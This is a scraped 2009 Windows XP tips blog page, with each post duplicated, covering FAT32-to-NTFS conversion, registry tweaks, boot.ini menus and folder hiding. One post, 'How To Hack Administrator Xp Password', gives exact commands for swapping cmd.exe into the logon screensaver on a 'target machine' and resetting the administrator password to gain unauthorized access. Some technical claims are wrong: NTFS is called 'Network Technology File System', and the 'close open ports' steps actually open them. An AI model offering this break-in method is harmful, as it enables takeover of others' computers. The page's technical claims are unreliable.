Showing posts with label trick. Show all posts
Showing posts with label trick. Show all posts

Tuesday, July 14, 2009

How To Convert Fat32 Partiton Into Ntfs In Win Xp

**********************************************************


What is FAT32??

File Allocation Table system to maintain files on hard disk. Developed by microsoft. Old windows systems like DOS, 98 and Xp supports FAT32 systems.

What is NTFS??

Network Technology File System again developed by Microsoft. New OS’s like Vista and Windows 7 supports NTFS systems only.

Why convert to NTFS??

  • FAT32 limits maximum file size to 4GB whereas there is no such limit in NTFS.
  • NTFS systems are more secure when compared to FAT32.
  • Probability of recovering accidentally deleted file is more in NTFS system then FAT32.
  • Maximum fault tolerance

How to Convert??

  1. Go to start->Run type cmd and press Enter.
  2. Type VOL C: and note down the information for volume c. (Change drive letter to the drive you want to convert)
  3. Now type CONVERT C:/FS:NTFS.  (Instead of C: enter any drive name you want.)
Converting FAT32 to NTFS

Converting FAT32 to NTFS

Remember, do not switch off your PC directly when the process is going on.

4.Now check your drive by repeating step 2.

**********************************************************

How To Convert Fat32 Partiton Into Ntfs In Win Xp

**********************************************************


What is FAT32??

File Allocation Table system to maintain files on hard disk. Developed by microsoft. Old windows systems like DOS, 98 and Xp supports FAT32 systems.

What is NTFS??

Network Technology File System again developed by Microsoft. New OS’s like Vista and Windows 7 supports NTFS systems only.

Why convert to NTFS??

  • FAT32 limits maximum file size to 4GB whereas there is no such limit in NTFS.
  • NTFS systems are more secure when compared to FAT32.
  • Probability of recovering accidentally deleted file is more in NTFS system then FAT32.
  • Maximum fault tolerance

How to Convert??

  1. Go to start->Run type cmd and press Enter.
  2. Type VOL C: and note down the information for volume c. (Change drive letter to the drive you want to convert)
  3. Now type CONVERT C:/FS:NTFS.  (Instead of C: enter any drive name you want.)
Converting FAT32 to NTFS

Converting FAT32 to NTFS

Remember, do not switch off your PC directly when the process is going on.

4.Now check your drive by repeating step 2.

**********************************************************

Hide All Icons OF Notification Area : Latest Tricks Tips Cheats Hacks

The system tray, also called the notification area, is the small area on the far right side
of the taskbar, in which utilities and programs that run in the background, such as
antivirus software, show their icons. I don’t find it a particularly intelligent use of
screen real estate, so I prefer not to see the icons there.

To hide them, run the Registry Editor and go to the following key:
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Ex
plorer.

Among other things, this key controls the display of objects throughout XP.
Create a new DWORD called NoTrayItemsDisplay. Assign it a value of 1. (A value
of 0 will keep the icons displayed.) Exit the Registry and reboot.
While you’re at the HKEY_CURRENT_USER/Software/Microsoft/Windows/
CurrentVersion/Policies/Explorer key, you can also delete the My Recent Documents
icon on the Start menu. Create a new DWORD called NoRecentDocsMenu.

Assign it
a value of 1. (A value of 0 will keep the icon displayed.) Exit the Registry and reboot.

Hide All Icons OF Notification Area : Latest Tricks Tips Cheats Hacks

The system tray, also called the notification area, is the small area on the far right side
of the taskbar, in which utilities and programs that run in the background, such as
antivirus software, show their icons. I don’t find it a particularly intelligent use of
screen real estate, so I prefer not to see the icons there.

To hide them, run the Registry Editor and go to the following key:
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Ex
plorer.

Among other things, this key controls the display of objects throughout XP.
Create a new DWORD called NoTrayItemsDisplay. Assign it a value of 1. (A value
of 0 will keep the icons displayed.) Exit the Registry and reboot.
While you’re at the HKEY_CURRENT_USER/Software/Microsoft/Windows/
CurrentVersion/Policies/Explorer key, you can also delete the My Recent Documents
icon on the Start menu. Create a new DWORD called NoRecentDocsMenu.

Assign it
a value of 1. (A value of 0 will keep the icon displayed.) Exit the Registry and reboot.

Add Specific Folders To Open Dialog Boxex : Latest Tricks Tips Cheats Hacks

**********************************************************


When you use certain Windows applications (such as Notepad) to open a file, on the
left side of the Open dialog box are a group of icons and folders (such as My
Documents, My Recent Documents, Desktop, My Computer, and My Network) to
which you can navigate to open files.

A registry hack will let you put just the folders
of your choosing on the left side of the Open dialog box. Note that when you do this,
it will affect XP applications such as Notepad and Paint that use the Open and Save
common dialog boxes. However, it won’t affect Microsoft Office applications and
other applications that don’t use the common dialog boxes. Run the Registry Editor
and go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\comdlg32. This is the key that determines how common dialog boxes are
handled.

You’re going to create a subkey that will create a customized location for the folders,
and then give that subkey a series of values, each of which will define a folder
location.To start, create a new subkey underneath EY_CURRENT_USER
\Software\Microsoft\Windows\CurrentVersion\ Policies\comdlg32 called Placesbar,
and create a String value for it named Place0. Give Place0 a value of the topmost
folder that you want to appear on the Open dialog box, for example, C:\Projects. Next,
create another String value for Placesbar called Place1. Give it a value of the second
folder that you want to appear on the Open dialog box.

You can put up to five icons
on the Open dialog box, so create new String values up to Place4 and give them
values as outlined in the previous steps. When you’re done, exit the Registry. You
won’t have to reboot for the changes to take effect. If you do not want any folders to
appear in common Open dialog boxes, you can do that as well. In
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\
comdlg32, create a new DWORD value called NoPlacesBar and give it a value of 1.
Exit the Registry.

If you want the folders back, either delete NoPlacesBar or give it a
value of 0.

**********************************************************

Add Specific Folders To Open Dialog Boxex : Latest Tricks Tips Cheats Hacks

**********************************************************


When you use certain Windows applications (such as Notepad) to open a file, on the
left side of the Open dialog box are a group of icons and folders (such as My
Documents, My Recent Documents, Desktop, My Computer, and My Network) to
which you can navigate to open files.

A registry hack will let you put just the folders
of your choosing on the left side of the Open dialog box. Note that when you do this,
it will affect XP applications such as Notepad and Paint that use the Open and Save
common dialog boxes. However, it won’t affect Microsoft Office applications and
other applications that don’t use the common dialog boxes. Run the Registry Editor
and go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\comdlg32. This is the key that determines how common dialog boxes are
handled.

You’re going to create a subkey that will create a customized location for the folders,
and then give that subkey a series of values, each of which will define a folder
location.To start, create a new subkey underneath EY_CURRENT_USER
\Software\Microsoft\Windows\CurrentVersion\ Policies\comdlg32 called Placesbar,
and create a String value for it named Place0. Give Place0 a value of the topmost
folder that you want to appear on the Open dialog box, for example, C:\Projects. Next,
create another String value for Placesbar called Place1. Give it a value of the second
folder that you want to appear on the Open dialog box.

You can put up to five icons
on the Open dialog box, so create new String values up to Place4 and give them
values as outlined in the previous steps. When you’re done, exit the Registry. You
won’t have to reboot for the changes to take effect. If you do not want any folders to
appear in common Open dialog boxes, you can do that as well. In
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\
comdlg32, create a new DWORD value called NoPlacesBar and give it a value of 1.
Exit the Registry.

If you want the folders back, either delete NoPlacesBar or give it a
value of 0.

**********************************************************

How To Create A Startup menu With Only One OS

Even if you have only one operating system, you can create a boot menu that will let
you choose to load your operating system with different parameters.

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Trace Problems XP Home Edition"
/fastdetect /bootlog /sos

This entry creates a startup log and displays information about the drivers and other
operating system information as it loads.
For the version of the operating system that loads in Safe Mode but that still allows
networking, you could create this entry:

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Safe Start XP Home Edition" /
fastdetect /safeboot:network

The boot.ini file would look like this, assuming that you want the menu to display for
30 seconds and you want normal XP startup to be the default:

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home
Edition" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Trace Problems XP Home Edition"
/fastdetect /bootlog /sos
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Safe Start XP Home Edition" /
fastdetect /safeboot:network

visit http://cultrick.blogspot.com for super Latest hacks tricks tips cheats and coolest computer tricks
http://cultrick.blogspot.com

How To Create A Startup menu With Only One OS

Even if you have only one operating system, you can create a boot menu that will let
you choose to load your operating system with different parameters.

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Trace Problems XP Home Edition"
/fastdetect /bootlog /sos

This entry creates a startup log and displays information about the drivers and other
operating system information as it loads.
For the version of the operating system that loads in Safe Mode but that still allows
networking, you could create this entry:

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Safe Start XP Home Edition" /
fastdetect /safeboot:network

The boot.ini file would look like this, assuming that you want the menu to display for
30 seconds and you want normal XP startup to be the default:

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home
Edition" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Trace Problems XP Home Edition"
/fastdetect /bootlog /sos
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Safe Start XP Home Edition" /
fastdetect /safeboot:network

visit http://cultrick.blogspot.com for super Latest hacks tricks tips cheats and coolest computer tricks
http://cultrick.blogspot.com

How To Hack Administrator Xp Password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly. Forget about the explanations as it is for the
sake of clarity purpose
                         
Command Expalnation

cd\                                                                *drops to root
cd\windows\system32                                 *directs to the system32 dir
mkdir temphack                                            *creates the folder temphack
copy logon.scr temphack\logon.scr             *backsup logon.scr
copy cmd.exe temphack\cmd.exe                *backsup cmd.exe
del logon.scr                                                 *deletes original logon.scr
rename cmd.exe logon.scr                            *renames cmd.exe to logon.scr
exit                                                                *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the screen
saver you will get an unprotected dos prompt with out logging into XP. Once this

visit http://cultrick.blogspot.com for super cool computer tricks
http://cultrick.blogspot.com

happens if you enter this command minus the quotes "net user <admin account name
here> password"
If the Administrator Account is called Frank and you want the password blah enter
this "net user Frank blah" and this changes the password on franks machine to blah
and you should be in.

How To Hack Administrator Xp Password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly. Forget about the explanations as it is for the
sake of clarity purpose
                         
Command Expalnation

cd\                                                                *drops to root
cd\windows\system32                                 *directs to the system32 dir
mkdir temphack                                            *creates the folder temphack
copy logon.scr temphack\logon.scr             *backsup logon.scr
copy cmd.exe temphack\cmd.exe                *backsup cmd.exe
del logon.scr                                                 *deletes original logon.scr
rename cmd.exe logon.scr                            *renames cmd.exe to logon.scr
exit                                                                *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the screen
saver you will get an unprotected dos prompt with out logging into XP. Once this

visit http://cultrick.blogspot.com for super cool computer tricks
http://cultrick.blogspot.com

happens if you enter this command minus the quotes "net user <admin account name
here> password"
If the Administrator Account is called Frank and you want the password blah enter
this "net user Frank blah" and this changes the password on franks machine to blah
and you should be in.

Monday, July 13, 2009

How To Enable task Manager Trick

Just Open Run From Start Menu.

Or simply press window key + R

Then Type the following and then press enter

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

How To Enable task Manager Trick

Just Open Run From Start Menu.

Or simply press window key + R

Then Type the following and then press enter

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

how to Make Your Folder invisible

To create a totally invisible folder..do the following steps

1.Make sure NumLock is on
2.Highlight the Icon you want to change
3.Right-Mouse click and select Rename
4.While holding down the Alt key, type 0160 ( 4m Numpad only)
5.Now the icon will have no name below it.

Now comes the hiding part


right click that folder -> properties -> customize -> change icon ->select any blank icon space from the list of icons and apply and ok.

this is your invisible folder.

how to Make Your Folder invisible

To create a totally invisible folder..do the following steps

1.Make sure NumLock is on
2.Highlight the Icon you want to change
3.Right-Mouse click and select Rename
4.While holding down the Alt key, type 0160 ( 4m Numpad only)
5.Now the icon will have no name below it.

Now comes the hiding part


right click that folder -> properties -> customize -> change icon ->select any blank icon space from the list of icons and apply and ok.

this is your invisible folder.

Saturday, July 11, 2009

How to close open ports ?

1. Click Start, point to All Programs, then Accessories, then Communications then Network Connections. (Or you can right click My Network Places on the desktop and choose Properties).
2. Right-click the Local Area Network or the connection you are using, then click Properties.
3. Click the Advanced tab, and then click Settings.

Note: The Settings button is unavailable when ICF is disabled and all ports are already open.

4. Click Add to open a new port.
5. In the Description box, type a name. For example, type: File & Printer.
In the Name or IP address of the computer hosting this service on your network box, type 127.0.0.1.
6. In both the External and Internal port boxes, type the port number.
7. Click either TCP or UDP, and then click Ok.
8. Repeat steps 4 - 8 and allow the appropriate ports to be open for file and printer sharing. To allow file and print sharing traffic, create and enable the following service definitions. In the External and Internal Ports, allow these ports: UDP 137, UDP 138, UDP 445, and TCP 139, and TCP 445.

How to close open ports ?

1. Click Start, point to All Programs, then Accessories, then Communications then Network Connections. (Or you can right click My Network Places on the desktop and choose Properties).
2. Right-click the Local Area Network or the connection you are using, then click Properties.
3. Click the Advanced tab, and then click Settings.

Note: The Settings button is unavailable when ICF is disabled and all ports are already open.

4. Click Add to open a new port.
5. In the Description box, type a name. For example, type: File & Printer.
In the Name or IP address of the computer hosting this service on your network box, type 127.0.0.1.
6. In both the External and Internal port boxes, type the port number.
7. Click either TCP or UDP, and then click Ok.
8. Repeat steps 4 - 8 and allow the appropriate ports to be open for file and printer sharing. To allow file and print sharing traffic, create and enable the following service definitions. In the External and Internal Ports, allow these ports: UDP 137, UDP 138, UDP 445, and TCP 139, and TCP 445.

Friday, July 10, 2009

Is Thumbs.db A virus , How To remove Thumbs.db

You can prvent the formation of thumbs.db just by Disabling Thumbnails with a Registry Hack

Open the registry (regedit.exe) from the Run command and navigate to the following
key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\

Explorer\Advanced

Double click on the DisableThumbnailCache key in the right-hand pane and change
the value to 1. If the key is not there, go to Edit, then New and choose DWORD

Value to create one with the same name.

Close the Registry and reboot your computer for the changes to take effect.
If you have a lot of folders with lots of pictures, it would be best to disable the
thumbnail cache because each picture in the cache is about 2KB, meaning a 1000
pictures in one folder would result in a cache of 2MBs!

Is Thumbs.db A virus , How To remove Thumbs.db

You can prvent the formation of thumbs.db just by Disabling Thumbnails with a Registry Hack

Open the registry (regedit.exe) from the Run command and navigate to the following
key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\

Explorer\Advanced

Double click on the DisableThumbnailCache key in the right-hand pane and change
the value to 1. If the key is not there, go to Edit, then New and choose DWORD

Value to create one with the same name.

Close the Registry and reboot your computer for the changes to take effect.
If you have a lot of folders with lots of pictures, it would be best to disable the
thumbnail cache because each picture in the cache is about 2KB, meaning a 1000
pictures in one folder would result in a cache of 2MBs!

How To Lock Your HArd Drive Without Password

go to folder options in any opened window,go to the second tab i.e VIEW tab...

go to last option i.e use simple file sharing.......tick it up....apply and close it....


Come to the My Computer window,now right click on any hard drive and further go to the security option and then allow or deny the permission of using that Hard Drive........


Further if u want complete denial then just remove the tick of the simple file sharing option.

How To Lock Your HArd Drive Without Password

go to folder options in any opened window,go to the second tab i.e VIEW tab...

go to last option i.e use simple file sharing.......tick it up....apply and close it....


Come to the My Computer window,now right click on any hard drive and further go to the security option and then allow or deny the permission of using that Hard Drive........


Further if u want complete denial then just remove the tick of the simple file sharing option.